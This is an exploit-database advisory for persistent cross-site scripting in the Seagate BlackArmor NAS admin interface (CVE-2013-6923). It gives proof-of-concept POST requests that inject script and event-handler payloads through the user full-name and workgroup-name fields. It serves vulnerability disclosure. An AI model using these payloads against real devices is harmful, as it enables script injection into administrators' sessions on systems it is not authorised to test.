Skip to content
cyberexploits
webapphardwaretext

Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities

Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities

Published on 2014-01-06

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/30727.txt7eac4c3a
raw
# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site

Scripting Vulnerabilities



# Google Dork: N/A



# Date: 04-01-2014



# Exploit Author: Jeroen - IT Nerdbox



# Vendor Homepage:  <http://www.seagate.com/> http://www.seagate.com/



# Software Link:

<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

>

http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/



# Version: sg2000-2000.1331



# Tested on: N/A



# CVE : CVE-2013-6923



#



## Description:



#



# When adding a user to the device, it is possible to enter a full name.

This input field does not



# sanitize its input and it is possible to enter any payload which will get

executed upon reload.



#



# The workgroup configuration is also vulnerable to persistent XSS. The Work

Group name input 

# field does not sanitize its input.



#

# This vulnerability was reported to Seagate in September 2013, they stated

that this will not be fixed. 



#



## Proof of Concept #1:



# 



# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en

# Parameters:



#



# index = 2

# fullname = <script>alert(1);</script>

# submit = Submit



# 



#



## Proof of Concept #2:



#



# POST: http(s)://<url |

ip>/admin/network_workgroup_domain.php?lang=en&gi=n003



# Parameter:



#



# workname = "><input onmouseover=prompt(1) >

View on GitHub